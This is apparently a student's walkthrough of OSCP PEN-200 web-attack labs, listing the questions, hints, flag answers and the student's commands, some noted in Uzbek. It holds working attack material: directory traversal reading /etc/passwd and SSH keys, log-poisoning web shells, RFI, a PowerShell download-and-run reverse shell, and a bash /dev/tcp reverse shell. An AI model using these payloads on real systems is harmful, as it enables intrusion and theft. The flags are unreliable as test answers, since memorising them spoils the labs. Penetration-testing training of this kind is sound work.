1. Follow the steps above and use the
vuln NSE script category
against VM #1. Listing 5 shows that the target is
vulnerable to CVE-2021-41773, but the redacted output omits multiple
additional found CVEs. Enter one of the other found CVEs from 2021.
Answer
CVE-2021-44224
View hints
1. Execute the Nmap command as shown in listing 5 and make sure to
update the IP address.
2. Filter results using grep for 'CVE-*' patterns.
3. Choose any CVE from 2021, apart from CVE-2021-41773.
Command
sudo nmap -sV -p 443 --script "vuln" 192.168.50.124
7.3.2. Working with NSE Scripts
Vulnerability Scanning - Working with NSE Scripts - VM #1
OSCP PEN-200 35
Labs
1.
Capstone Labs: Follow the steps above to perform the
vulnerability scan with the custom NSE script on VM #1. Copy the
link from the script output after
Verify arbitrary file read: and
use it as a parameter for curl. This will retrieve the content of
/etc/passwd of the target machine and display it. Be aware that
you need to use
http instead of https while keeping port 443 when
you paste the link. Embed the last username of the file in the braces
of "OS{}" and provide it as the answer to this exercise.
Answer
OS{0e9e4eccf43a013e25568382fea0e554}
View hints
1. Ensure CVE-2021-41773.nse script is acquired from GitHub and
integrated into Nmap.
2. Execute Nmap specifying the acquired script.
3. Use curl with the cgi-bin link (using http on port 443) to
access /etc/passwd.
Command
sudo cp /home/kali/Downloads/http-vuln-cve-2021-41773.nse /usr/share/nmap/scripts/http-vuln-cve2021-41773.n
sudo nmap --script-updatedb
sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.50.124
curl http://192.168.155.13:443/cgi-bin/../../../../etc/passwd
OSCP PEN-200 36
8. Introduction to Web Application Attacks
8.2.4. Security Testing with Burp Suite
Web Application Assessment Tools - Walkthrough VM #1
Web Application Assessment Tools - Module Exercise VM #1
Web Application Assessment Tools - Module Exercise VM #2
Labs
1. We have been tasked to test the SMS Two-Factor authentication of a
newly-developed web application.
The SMS verification code is made by four digits. Which Burp tool is
most suited to perform a brute force attack against the keyspace?
Answer
intruder
View hints
no hints
Command
no commands
2. Repeat the steps we covered in this Learning Unit and
enumerate the targets via Nmap, Wappalyzer and Gobuster by starting
Walkthrough VM 1.
When performing a file/directory brute force attack with Gobuster, what is the HTTP response code related to
redirection?
Answer
301
View hints
1. Refer to listing 3 in "Directory Brute Force with Gobuster."
2. For a more detailed explanation of HTTP status codes, we recommend visiting the following
HTTP response status codes
Command
gobuster dir -u 192.168.155.16 -w /usr/share/wordlists/dirb/common.txt -t 5
3. Start up the Walkthrough VM 1 and replicate the steps we covered in this Learning Unit for using Burp Suite.
What is the default port Burp proxy is listening to?
Answer
8080
View hints
no hints
Command
OSCP PEN-200 37
OPEN BURP SUITE
START BROWSER
DO INTERCEPT ON
GO ON THAT BROWSER
SEARCH THAT IP
VIEW PROXY TAB —> HTTP history
4. We have a lot of mess on our hands, and the new DIRTBUSTER
cleaning service is just what we need to help with the cleanup! You
can visit their new site on the Module Exercise VM #1, but it is still under
development. We wonder where they hid their admin portal.
Once found the admin portal, log-in with the provided credentials to obtain the flag.
Answer
OS{dc1e95100a23ea967bd3fc1e7682cc05}
View hints
1. Refer to listing 3 in "Directory Brute Force with Gobuster."
2. After identifying additional directories, ensure that you log in
using the credentials provided in the Training Library for Module
Exercise VM #1.
Command
gobuster dir -u 192.168.155.52 -w /usr/share/wordlists/dirb/common.txt -t 5
OSCP PEN-200 38
5. The DIRTBUSTER team finally changed their default credentials, but they are not very original. We complied at
http://target_vm/passwords.txt
of potential passwords from the DIRTBUSTER employee contact info - I am
confident the password is in there somewhere. The username is still
admin, and the new login portal is available at the web server root folder on the Module Exercise VM #2.
Answer
OS{8592d21d55b4dabcfe908630788d652c}
View hints
1. Download the password.txt file by replacing the target_vm with your assigned VM #2.
2. Repeat these steps using Burp's Intruder to load password.txt.
3. Ensure that you're only scanning the password field.
4. Login with the new password.
Command
gobuster dir -u 192.168.155.52 -w /usr/share/wordlists/dirb/common.txt -t 10
login page ni topib olamiz
burp browser yordamida http://ip/index.html/ ga request jo’natamiz
username ga admin kiritib POST request jo’natamiz
OSCP PEN-200 39
va shu requestni intruderga olib o’tamiz
&password dan keyin shu §§ 2 ta belgini qo’yib orasiga hohlagan narsani yozb o’zgaruvchi sifatida ochib qo’yamiz
payloads tab dan payload settings ga wordlistimizni yuklaymiz, start attackni bosamiz
OSCP PEN-200 40
results dan pasidigi javobni response ga o’tqazib qaytgan responseni qarab chiqamiz
8.3.3. Enumerating and Abusing APIs
Web Application Enumeration - Walkthrough VM #1
Web Application Enumeration - Walkthrough VM #2
Web Application Enumeration - Exercise VM #1
Web Application Enumeration - Exercise VM #2
Web Application Enumeration - Exercise VM #3
Web Application Enumeration - Exercise VM #4
Labs
1. Start up the
Walkthrough VM 1 and modify the Kali /etc/hosts file to reflect the provided dynamically-allocated IP address that has
been assigned to the offsecwp instance. Use Firefox to get familiar with the Developer Debugging Tools by navigating
to the offsecwp site and replicate the steps shown in this Learning Unit. Explore the entire WordPress website and
inspect its HTML source code in order to find the flag.
Answer
OS{2e589a17a825518cc72b39aa394fae74}
View hints
1. Add VM1's IP as "offsecwp" in your /etc/hosts file.
2. Click on links to understand the web application's dynamic pages better. About us page can be promising.
3. Utilize developer tools; the flag starts with "OS{" and you can search it directly.
Command
inspect qilamiz va link larni birma bir ko’zdan kechiramiz
OSCP PEN-200 41
2. Start Walkthrough VM 2 and replicate the curl command we learned in this section in order to map and exploit the
vulnerable APIs. Next, perform a brute force attack to discover another API that has a same pattern as /users/v1. Then,
perform a query against the base path of the new API: what's the name of the item belonging to the admin user?
NOTE: A dirbuster wordlist should help on this task.
Answer
bookTitle22
View hints
NO HINTS
Command
pattern degan file yaratib ichiga shu patterni yozamiz
gobuster dir -u http://192.168.175.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern -t 100
3. This website running on the Exercise VM 1 is dedicated to all things maps! Follow the maps to get the flag.
Answer
OS{3d8108e17702ec60f2e4b7fe6d7ca9ad}
View hints
1. robots.txt and sitemap.xml contain important directories
2. Combine the flags after obtaining the first and second parts.
Command
burp suitega kirib target bo’limidan sitemapga kiramiz
http://ip/sitemap.xml koramiz
OSCP PEN-200 42
bizga flagni 2 chi yarmini berdi endi 2 chi yarmini ko’ramiz
korib turganimizdek yana 1 ta flag***.html ko’rindi, unga request jonatamiz
4. Inspect the Exercise VM 2 web application URL and notice if anything is interesting at the URL level.
Answer
OS{1fb07fbce8c156990e9c9b334b49c3bb}
View hints
1. If you encounter server redirection after accessing the exercise IP, ensure curl follows redirects (-L).
2. The flag might be encoded; use tools like hURL to decode it.
Command
http://ip/ request jonatamiz va inspect qilamiz, network tab ga kiramiz
5. We made another website, but something is wrong. The site is
available at Exercise VM 3, but it keeps giving some weird, non-standard
OSCP PEN-200 43
responses. Check out the HTTP headers that accompany this site.
Answer
OS{886a67a5dab3b148ed47f32e904edb67}
View hints
1. HTTP response headers can be added with curl's (-i) option.
2. Analyze the response output for any non-standard header.
3. To obtain the flag, you may need to decode it.
Command
Burp ga kiramiz browserdan http://ip/ ga request yuboramiz, burpda HTTP headerida encode qilingan flag bor ekan
6. We made this cool website dedicated to the three web amigos: HTML,
CSS, and JavaScript. It is available at the web root on the Exercise
VM 4. Closely review each of the three friends to find the flag for
this challenge.
Answer
OS{48f33e8d146f5e1c3e88eb24aa4ad8cc}
View hints
1. The flag is split into three parts across HTML, CSS, and JavaScript.
2. Examine the application's source code, investigate other .css and .js files, and use console.log for any interesting
function.
3. Combine the flag parts together and submit them.
Command
Brave browser dan http://ip/ ga request jo’natamiz, va inspekt qlamiz
1-chi yarmi index.html ichida
2-chi yarmi jumbotron.css ichida
OSCP PEN-200 44
3-chi yarmi burp suite dan color_flash.js dan 16 marta base64 da encode qilingan ekan 16 marta decode qilamiz
8.4.5. Privilege Escalation via XSS
XSS - Walkthrough VM #1 192.168.165.16
XSS - Walkthrough VM #2
XSS - Module Exercise VM #1
Labs
1. Start Walkthrough VM 1 and replicate the steps learned in this
Learning Unit to identify the basic XSS vulnerability present in the
Visitors plugin.
Based on the source code portion we have explored, which other HTTP
header might be vulnerable to a similar XSS flaw?
Answer
X-Forwarded-For
View hints
1) Add VM #1's IP address to your /etc/hosts file as 'offsecwp.
2) Use the same GET request to
http://offsecwp/
as shown in Figure 26 in the Basic XSS learning unit.
3) Examine the array in Listing 24 to identify potentially vulnerable HTTP headers.
4) Capitalize only the first letters of each word in the vulnerable HTTP header.
5) Add the header you want to test to your GET request and assess it for a simple XSS payload, as demonstrated in
the course material.
Command
2. Start Walkthrough VM 2 and replicate the privilege escalation steps
we explored in this Learning Unit to create a secondary administrator
OSCP PEN-200 45
account. What is the JavaScript method responsible for interpreting a string as
code and executing it?
Answer
eval
View hints
no hints
Command
3. Capstone Lab: Start Module Exercise VM 1 and add a new administrative account like we did in this Learning Unit.
Next, craft a WordPress plugin that embeds a web shell and exploit it to enumerate the target system.
Upgrade the web shell to a full reverse shell and obtain the flag located in
/tmp/.
Note: The WordPress instance might show slow responsiveness due to lack of internet connectivity, which is expected.
Answer
OS{f8b685b91c1f0ab3a69b84532d4a36f5}
View hints
1) For uploading a web shell and receiving a reverse shell on wordpress machine please take a look at the following
resources:
https://github.com/leonjza/wordpress-shell
https://rioasmara.com/2019/02/25/penetration-test-wordpress-reverse-shell/
https://pentaroot.com/exploit-wordpress-backdoor-theme-pages/
2) If the website is too slow please try lowering your MTU:
https://help.offsec.com/hc/en-us/articles/360046293832#general-vpn-tips
Command
http://ip/wp-admin/ ga kiramiz
user enumerate qilib ko’ramiz
OSCP PEN-200 46
bunday user yoq ekan
admin user bor ekan password noto’gri dedi
u yerdan user va passwordiga admin/admin deb yozib kirishga harakat qilamiz, ammo kirmaydi
wpscan –url <IP> –wordlist /usr/share/wordlists/rockyou.txt –username admin
paroli chiqadi
OSCP PEN-200 47
endi Wordpressni ichiga kiramiz, va kiradi, shell.php ni PLUGIN tab ichidan yuklaymiz
yuklab ACTIVATE qilamiz va bu yerda example ko’rsatgan huddi shu exampleni BURPSUITE da yuqoridan
o’rganganlarimizdan amalga oshiramiz
9. Common Web Application Attacks
9.1.1. Absolute vs Relative Paths
Labs
1. How many ../ do you need to go from the /var/log/ directory to the root file system (/)? Enter the number below.
Answer
View hints
1. Navigate to the /var/log directory using the command "cd /var/log".
2. Count the number of ""../"" to reach the root directory (""/"").
OSCP PEN-200 48
Command
no commands
2. Enter the command in combination with the relative path containing the minimum number of ../ sequences to display
the contents of the /etc/passwd file when the current working directory of the terminal is /usr/share/webshells/.
Answer
cat ../../../etc/passwd
View hints
Command
no commands
9.1.2. Identifying and Exploiting Directory Traversals
Common Web Application Attacks - Directory Traversal - VM #1 192.168.160.16
Common Web Application Attacks - Directory Traversal - VM #2
Labs
1. Follow the steps above and leverage the directory traversal
vulnerability in the "Mountain Desserts" web application on VM #1. Use
curl or Burp to obtain the SSH private key for the user offsec. Use it to connect via SSH on port 2222 and find the flag
in the SSH banner, which is displayed after you log in.
Answer
OS{743c036ca9c244b3e1a0029136867263}
View hints
1. Obtain the id_rsa SSH key file content through the directory traversal vulnerability.
2. Set the correct permissions by running ""chmod 400"" on the SSH key file.
3. When using the key to connect with SSH, remember to specify port 2222 (-p 2222).
Command
http://ip/ ga request jonatib ko’ramiz, va bizga error 404, 403 beradi
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
shu linkga curl orqali request jo’natamiz
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
bizga RSA key beradi buni file ga saqlab
chmod 400 <RSA_filename>
permission beramiz, va ssh orqali ulanishga xarakat qilamiz
ssh -i dt_key -p 2222 [email protected]
ulanb, bannerida flag beradi
OSCP PEN-200 49
2. The target VM #2 runs Grafana on port 3000. The service is
vulnerable to CVE-2021-43798, which is a directory traversal
vulnerability. Search for "golangexample cve-2021-43798" in a search
engine to get familiar with how the vulnerability can be exploited. Use
curl and the --path-as-is parameter to find the flag in C:\Users\install.txt.
Answer
OS{9bc34ba11067d2feb28438c339e05c3b}
View hints
no hints
Command
https://github.com/taythebot/CVE-2021-43798 shuni yuklab olib, shu ko’rinishda ishlatamiz
go run exploit.go -target http://192.168.160.193:3000 -file /Users/install.txt
9.1.3. Encoding Special Characters
Common Web Application Attacks - Directory Traversal Encoding - VM #1
Common Web Application Attacks - Directory Traversal Encoding - VM #2
Labs
1. In this section, we used URL encoding to exploit the directory traversal vulnerability in Apache 2.4.49 on VM #1. Use
Burp or curl to display the contents of the /opt/passwords
file via directory traversal in the vulnerable Apache web server.
Remember to use URL encoding for the directory traversal attack. Find
the flag in the output of the file.
Answer
OS{43a040c8e14a03b2e69bd802b587b4de}
View hints
1. URL-encode "../" to mimic the appearance in listing 12 for Directory Traversal.
2. The vulnerability and the URL is the same as shown in listing 12,
the only difference will be obtianing the content of /opt/passwords.
Command
curl http://ip/cgi-bin/../../../../etc/passwd
OSCP PEN-200 50
2. Grafana is running on port 3000 on VM #2. The version running is
vulnerable to the same directory traversal vulnerability as in the
previous section. While URL encoding is not needed to perform a
successful directory traversal attack, experiment with URL encoding
different characters of your request to display the contents of
/etc/passwd. Once you have a working request utilizing URL encoding, obtain the flag by displaying the contents of
/opt/install.txt.
Answer
OS{f6d2bd478b1c756c75632e9049d5400b}
View hints
1. Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
2. URL-encode specific parts of the URL for testing.
3. If you encounter issues executing the Python script, try accessing it through your browser.
Command
go run exploit.go -target http://192.168.188.16:3000 -file /opt/install.txt
9.2.1. Local File Inclusion (LFI)
Common Web Application Attacks - Local File Inclusion - VM #1
Common Web Application Attacks - Local File Inclusion - VM #2
Common Web Application Attacks - Local File Inclusion - VM #3
Labs
1. Follow the steps in this section and leverage the LFI vulnerability in the web application (located at
http://mountaindesserts.com/meteor/) to receive a reverse shell on WEB18 (VM #1). Get the flag from the
/home/ariella/flag.txt file. To display the contents of the file, check your sudo privileges with sudo -l and use them to
read the flag.
Answer
OS{d86d5a7f3458c79e630506d6b5a4d814}
View hints
1. Access the URL as shown in figure 8 to capture Burp request.
2. Modify the User-Agent as shown in figure 9.
OSCP PEN-200 51
3. Achieve RCE by following figure 10.
4. URL-encode your reverse shell, similar to the listing 18.
5. "sudo" is required to read the flag.
Command
User-agent ga shu kodni joylab
<?php echo system($_GET['cmd']); ?>
/meteor/index.php?
page=../../../../../../../../../var/log/apache2/access.log&cmd=sudo%20cat%20/home/ariella/f
2. Exploit the LFI vulnerability in the web application "Mountain Desserts" on WEB18 (VM #2) (located at
http://mountaindesserts.com/meteor/) to execute the PHP /opt/admin.bak.php file with Burp or curl. Enter the flag
from the output.
Answer
OS{4fb700458a6d5a0e2c5dc26c9e0c74ea}
View hints
1. Access Admin at the bottom of http://192.168.xxx.xxx/meteor/ to capture a GET request with Burp.
2. Refer to listing 13 and replace the /var/log/apache2/access.log with /opt/admin.bak.php.
Command
/meteor/index.php?page=../../../../../../../../../opt/admin.bak.php&cmd=pwd
3. The "Mountain Desserts" web application now runs on VM #3 at http://192.168.50.193/meteor/ (The third octet of
the IP address in the URL needs to be adjusted). Use the LFI vulnerability in combination with Log Poisoning to execute
the
dir command. Poison the access.log log in the XAMPP C:\xampp\apache\logs log directory . Find the flag in one of the
files from the dir command output.
OSCP PEN-200 52
Answer
OS{f5e98290fd841b84fa77684046c08dc4}
View hints
1. Follow the steps in this learning using the xampp\apache\logs for log poisoning.
2. If you find any interesting files, read them with 'type '.
3. URL-encode the spaces between the command and parameters with '%20
Command
/meteor/index.php?page=\..\..\..\..\..\..\..\..\xampp\apache\logs\access.log&cmd=dir
/meteor/index.php?
page=\..\..\..\..\..\..\..\..\xampp\apache\logs\access.log&cmd=type%20hopefullynobodyfind
9.2.2. PHP Wrappers
Common Web Application Attacks - PHP Wrapper - VM #1
Labs
1. Exploit the Local File Inclusion vulnerability on WEB18 (VM #1) by using the
php://filter with base64 encoding to include the contents of the /var/www/html/backup.php file with Burp or curl.
Copy the output, decode it, and find the flag.
Answer
OS{047f838f32b3bf8400b49a2951d9d0a9}
View hints
1. Follow listing 22 to include base64 encoded admin.php. Replace
""admin.php"" with ""/var/www/html/backup/php"" as mentioned in the
OSCP PEN-200 53
question.
2. Inspect the output for a base64-encoded string and decode it to obtain the flag.
Command
curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www
echo "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEY
2. Follow the steps above and use the data:// PHP Wrapper in combination with the URL encoded PHP snippet we used
in this section to execute the uname -a command on WEB18 (VM #1). Enter the Linux kernel version as answer.
Answer
5.4.0-137-generic
View hints
1. Follow listing 25.
2. Replace the "ls" command with "uname -a" as mentioned in the question.
3. Be sure to URL encode your command.
Command
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('uname%
9.2.3. Remote File Inclusion (RFI)
Common Web Application Attacks - RFI - VM #1
Common Web Application Attacks - RFI - VM #2
Labs
1. Follow the steps from this section to leverage RFI to remotely include the
/usr/share/webshells/php/simple-backdoor.php PHP file. Use the "cmd" parameter to execute commands on VM #1
and use the cat command to view the contents of the authorized_keys file in the /home/elaine/.ssh/ directory. The file
contains one entry including a restriction for allowed commands. Find the flag specified as the value to the command
parameter in this file.
Answer
OS{04a86c19fcc01514b160947d7bceb6b2}
View hints
1. Follow the steps in this learning unit and make sure to update the IP for your tun0 interface.
2. List the directory, and ensure URL encode any spaces.
OSCP PEN-200 54
3. Read the file present in /home/elaine/.ssh/, ensuring you URL encode any spaces for the flag.
Command
python3 -m http.server 80
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.45.170/simple-backdoor.php&cmd=cat /
2. Instead of including the /usr/share/webshells/php/simple-backdoor.php webshell, include the PHP reverse shell
from Pentestmonkey's Github repository. Change the $ip variable to the IP of your Kali machine and $port to 4444.
Start a Netcat listener on port 4444 on your Kali machine and exploit the RFI vulnerability on VM #2 to include the PHP
reverse shell. Find the flag in the /home/guybrush/.treasure/flag.txt file.
Answer
OS{64bd31334f4c313a88f1136adc82a49a}
View hints
1. PHP reverse shell
2. After updating the ip and port variables,host the reverse shell with a python HTTP server.
3. Start a nc listener.
4. Use curl to include the hosted reverse shell.
Command
python3 -m http.server 80
nc -lnvp 4444
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.45.170/php-reverse-shell.php"
9.3.1. Using Executable Files
Common Web Application Attacks - File Upload Executable - VM #1 192.168.221.189
Common Web Application Attacks - File Upload Executable - VM #2
Labs
1. Follow the steps above on VM #1 and exploit the file upload vulnerability. The flag is located in the
C:\xampp\passwords.txt file as a password for the mountainadmin user.
Answer
OS{5f79e9737c1c0f633c7bf62e585fa58e}
View hints
OSCP PEN-200 55
1. Navigate to the http://192.168.xxx.xxx/meteor.
2. Use the upload function to upload our /usr/share/webshells/php/simple-backdoor.pHp file.
3. We should now have RCE using this uploaded webshell as shown in listing 30.
Command
http://ip/meteor/ ga simple-backdoor.php ni oxiridagi extensionini .pHP ga o’zgartirib upload qilamiz
curl "http://192.168.221.189/meteor/uploads/simple.pHP?cmd=type C:\\xampp\\passwords.txt"
2. The target VM #2 is running an instance of TinyFileManager. Disable Burp before you start to avoid issues with the
web application. Log in to the web application at http://192.168.50.16/index.php with the user admin and password
admin@123. Find a way to get code execution by using an uploaded web shell. Display the contents of the
/opt/install.txt file to get the flag.
Answer
OS{27080886446fc35d1196a2ccaedcdd76}
View hints
1. Click 'Upload' in the top right to upload your webshell or reverse shell.
2. Alternatively, modify an existing file, like config.php, by replacing its content with your shell.
Command
http://ip/ ga simple-backdoor.php ni oxiridagi extensionini .pHP ga o’zgartirib upload qilamiz
curl "http://192.168.221.16/simple.pHP?cmd=cat /opt/install.txt"
9.3.2. Using Non-Executable Files
Common Web Application Attacks - File Upload Non-Executable - VM #1 192.168.221.16
Labs
1. Follow the steps above on VM #1 to overwrite the
authorized_keys file with the file upload mechanism. Connect to the system via SSH on port 2222 and find the flag in
/root/flag.txt.
Answer
OS{7ef40765a20dac463d7663cb326d44ae}
View hints
1. Follow listing 37 to create a private and public key to use.
2. Capture the upload with Burp and modify as shown in figure 21 in root home directory.
3. SSH to port 2222 with your private key using "-p 2222".
Command
OSCP PEN-200 56
/etc/hosts ga ipni mountaindesserts.com ga to’g’illaymiz
mountaindesserts.com:8000 ga kiramiz
sshkeygen
orqali publi key yaratamiz
cat filename.pub > authorized_keys
ga yozamiz
burpsuite ochib bizni authorized fileni belgilaymiz upload bosamiz, burp dan forward bosishdan oldin
../../../../../../../root/.ssh/authorized_keys shu pathni berami bizni faylni root ni ichiga joylaydi
Now that the authorized_keys file contains our
public key, we can upload it using the relative path
../../../../../../../root/.ssh/authorized_keys. We will select our
authorized_keys file in the file upload form and enable intercept
in Burp before we click on the
Upload button. When Burp shows the
intercepted request, we can modify the filename accordingly and press
Forward.
rm ~/.ssh/known_hosts
ssh -p 2222 -i fileup [email protected]
eski hostlarni o’chirib ssh orqali bizni generate qilgan keymiz orqali ssh ga ulanamiz, va ulanadi
9.4.1. OS Command Injection
OSCP PEN-200 57
Common Web Application Attacks - Command Injection - VM #1
Common Web Application Attacks - Command Injection - VM #2
Common Web Application Attacks - Command Injection - VM #3
Common Web Application Attacks - Command Injection - VM #4
Labs
1. Follow the steps above and exploit the command injection
vulnerability on VM #1 to obtain a reverse shell. Since the machine is
not connected to the internet, you have to skip the step of cloning the
repository from the beginning of this section. Find the flag on the
Desktop for the
Administrator user.
Answer
OS{5344f71708b215d24e66703cfb658d04}
View hints
1. Follow figure 26 to capture the git clone request.
2. Refer to listing 41 for RCE on the webserver.
3. Use listing 47 for a reverse shell with powercat.
Command
http://ip:8000 submit joyiga ubunarsa yozib burpsuitedan koramiz
shu archive degan joyidan command execution qilamiz
curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive
shu commandni yozib tekshirib ko’ramiz
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem
powershell bor yoki yoqligini shu command orqali tekshirib ko’ramiz
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 80
nc -nvlp 4444
larni ishga tushirib
IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell
curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3
OSCP PEN-200 58
shu commandni ip larini to’g’irlab execute qilamiz
netcatdan listen qvotgan joyida bizda reverse shell ochiladi, administratorri desktopidan flagnni olamiz
2. For this exercise the Mountain Vaults application runs on
Linux (VM #2). Exploit the command injection vulnerability like we did
in this section, but this time use Linux specific commands to obtain a
reverse shell. As soon as you have a reverse shell use the
sudo su command to gain elevated privileges. Once you gain elevated privileges, find the flag located in the
/opt/config.txt file.
Answer
OS{3c35da7d9b4b2b6a1264dd8b795637da}
View hints
1. Follow figure 26 to capture the git clone request.
2. Refer to listing 41 for RCE on the webserver.
3. Enumerate available commands by using "which command" such as "nc" to achieve reverse shell.
4. Remember to URL encode your commands.
Command
http://ip:80/ ga request jo’natamiz, va input qabul qiladigan joyiga ubu narsa yozib burpsuite dan qanday qabul
qivotganini ko’ramiz
curl -X POST --data 'Archive=git%3Bls' http://ip:80/archive
ishlatib ko’ramiz
curl -X POST --data 'Archive=git%3Bsudo%20cat%20/opt/*' http://ip:80/archive
3. Capstone Lab: Start the Future Factor Authentication application on VM #3. Identify the vulnerability, exploit it and
obtain a reverse shell. Use sudo su in the reverse shell to obtain elevated privileges and find the flag located in the
/root/ directory.
Answer
OS{00fad2eb731e908d2a56caaccb5714e1}
View hints
1. Visit VM #3's webserver to find three fields on the login page.
2. Test various inputs like && to identify the command injection vulnerability.
3. Assume the back-end uses a vulnerable function like
eval() or popen(): popen(f'echo "test"')
Command
nc -nvlp 4444
netcat orqali listen qilamiz
burp ochib http://ip/ ga request jonatamiz va bizni /login paga olib o’tadi, u yerdan hamma field ni to’ldirib burp dan
headerlarini check qilamiz
OSCP PEN-200 59
ffa degan joyiga bash -c "bash -i >& /dev/tcp/192.168.XX.XX/4444 0>&1" ni url encoded variantini tashlaymiz
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22
jo’natganimizda netcatdan listen qlgan joyimizda reverse shell ni qo’lga kiritamiz
4. Capstone Lab: Enumerate the machine VM #4. Find the web application and get access to the system. The flag can
be found in C:\inetpub\.
Answer
OS{c36f5e292568384919cc65cb526ee9c7}
View hints
1. Nmap to find open HTTP ports.
2. Explore the main page of the ports for file upload.
3. Upload a webshell and identify the web server for server-side scripting (PHP or ASPX).
4. Index page provides hints on locating your webshell.
Command
nmap da scan qilamiz
OSCP PEN-200 60
http://ip:8000/ ga kiramiz va bizga upload qilib bo’ladigan web page ochiladi u yerga cmdasp.aspx file ni yuklaymiz,
va http://ip:80/cmdasp.aspx ga kirsak command execute qiladigan web reverse shell page ochiladi u yerdan
command execute qila olamiz
10. SQL Injection Attacks
10.1.2. DB Types and Characteristics
SQL Injections Attacks - SQL Theory and Databases - MySQL - VM #1
SQL Injections Attacks - SQL Theory and Databases - MSSQL - VM #2
SQL Injections Attacks - SQL Theory and Databases - MySQL - VM #3
Labs
1. From your Kali Linux VM, connect to the remote MySQL instance on
VM 1 and replicate the steps to enumerate the MySQL database. Then
explore all values assigned to the user
offsec. Which plugin value
is used as a password authentication scheme?
Answer
caching_sha2_password
View hints
Refer to the query shown in listing 7 and add an additional column to the SELECT statement that retrieves
information about the plugin used.
Command
OSCP PEN-200 61
mysql -u root -p'root' -h 192.168.178.16 -P 3306 --ssl=0
MySQL [(none)]> SELECT plugin, authentication_string FROM mysql.user WHERE user = 'offsec';
2. From your Kali Linux VM, connect to the remote MSSQL instance
on VM 2 and replicate the steps to enumerate the MSSQL database.
Then explore the records of the
sysusers table inside the master
database. What is the value of the first user listed?
Answer
public
View hints
HINT
1. Follow the steps in listing 8 connect to the MSSQL.
2. To explore the sysusers table in the master database, use an SQL query that selects all columns from the table.
3. Provide the name of the first listed user as the answer for this exercise.
HINT
1. The sysusers table is a built-in MSSQL system table
2. Refer to MSSQL documentation on how to enumerate system tables
Command
impacket-mssqlclient Administrator:[email protected] -windows-auth
SELECT name FROM sysusers;
OSCP PEN-200 62
3. From your Kali Linux VM, connect to the remote MySQL instance on VM
3 and explore the
users table present in one of the databases to get
the flag.
Answer
OS{e2bf4f6cff2a8e8a84c65e8971f059a1}
View hints
1. List all the databases by using the SQL query 'show databases'.
2. Switch to the relevant database and use the SQL * SELECT query to retrieve all values from the 'users' table.
Command
mysql -u root -p'root' -h 192.168.178.16 -P 3306 --ssl=0
show databases;
use test;
select * from users;
OSCP PEN-200 63
10.2.3. Blind SQL Injections
SQL Injections Attacks - Manual SQL Exploitation - VM #1
Labs
1. Boot up VM 1 and replicate the SQLi authentication bypass
payload we have explored in this Learning Unit.
In this section, which PHP variable is used to store user's input?
Answer
$_POST
View hints
1. Pay attention to the web page login form. Is GET or POST used when you submit your credentials?
2. Once you've identified,look for the PHP variable.
3.
reserved variables
Command
2. Continue working on VM 1 and replicate the SQLi UNION-based
attack we have discussed in this Learning Unit. For the UNION-based
OSCP PEN-200 64
attack to succeed, what other condition needs to be satisfied in
addition to having the same data types among the two queries?
Answer
same number of columns
View hints
For UNION SQLi attacks to work, we first need to satisfy two conditions:
1. The injected UNION query has to include the same number of columns as the original query.
2. The data types need to match for each column.
Command
no commands
3. Replicate the time-based and boolean-based blind SQL injections
described in this Learning Unit on VM 1.
Blind SQLi are called like this because the database output is never
returned to the user. To infer the result of the query, the output of
which component is employed instead?
Answer
web application
View hints
1. Consider where the output of the boolean/blind SQLi queries is observed.
2. Note that the blind SQLi payload directly impacts a particular service, not the database.
3. The answer can be found in this learning unit, highlighted in red.
Command
10.3.2. Automating the Attack
SQL Injections Attacks - Code Execution - MSSQL - VM #1
SQL Injections Attacks - Code Execution - MySQL - VM #2
SQL Injections Attacks - Code Execution - MySQL - VM #3
SQL Injections Attacks - Module Exercise - VM #1
SQL Injections Attacks - Module Exercise - VM #2
SQL Injections Attacks - Module Exercise - VM #3
SQL Injections Attacks - Module Exercise - VM #4
Labs
1. Connect to the MSSQL VM 1 and enable
xp_cmdshell as showcased
in this Module. Which MSSQL configuration option needs to be enabled
before
xp_cmdshell can be turned on?
Answer
show advanced options
OSCP PEN-200 65
View hints
Use the commands provided in listing 27 under the Manual Code Execution learning unit.
Command
2. Connect to the MySQL VM 2 and repeat the steps illustrated in this
section to manually exploit the UNION-based SQLi. Once you
have obtained a webshell, gather the flag that is located in the same
tmp folder.
Answer
OS{9ae211424ab9c435ced674e723b2f14b}
View hints
1. Determine the number of columns by using the ORDER BY clause.
2. Once you have determined the number of columns, use the UNION SELECT for simple code execution such as
@@version.
3. Use the INTO OUTFILE to write a webshell to /var/www/html/tmp/.
Command
3. Connect to the MySQL VM 3 and automate the SQL injection discovery
via sqlmap as shown in this section. Then dump the
users table by
abusing the time-based blind SQLi and find the flag that is stored in
one of the table's records.
Answer
OS{b307fb4948f369b58c5faa589f45b0a4}
View hints
1. Time-based Blind SQLi can be slow, be patient.
2. To speed up the extraction, specify the table name with the -T flag
when using sqlmap and adjust concurrency with --threads for faster
extraction.
3. Use the --dump flag to extract specific columns.
Command
OSCP PEN-200 66
' UNION SELECT null, username, password, description, null FROM users -- //
4. Capstone Lab: Enumerate the Module Exercise - VM #1 and
exploit the SQLi vulnerability to get the flag.
Answer
OS{fcc79dc2e9ef7f3724be5a16808abe21}
View hints
Visit the website and add alvida-eatery.org to your hosts file.
